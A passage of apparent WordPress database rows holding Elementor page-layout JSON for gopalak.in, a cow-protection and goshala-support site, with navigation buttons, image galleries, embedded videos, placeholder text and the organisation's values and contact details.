\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10116,1695,'_elementor_page_assets','a:0:{}'),(10118,1696,'_elementor_edit_mode','builder'),(10119,1696,'_elementor_template_type','wp-page'),(10120,1696,'_elementor_version','3.7.8'),(10121,1696,'_wp_page_template','elementor_canvas'),(10122,1696,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\"},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\"},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, 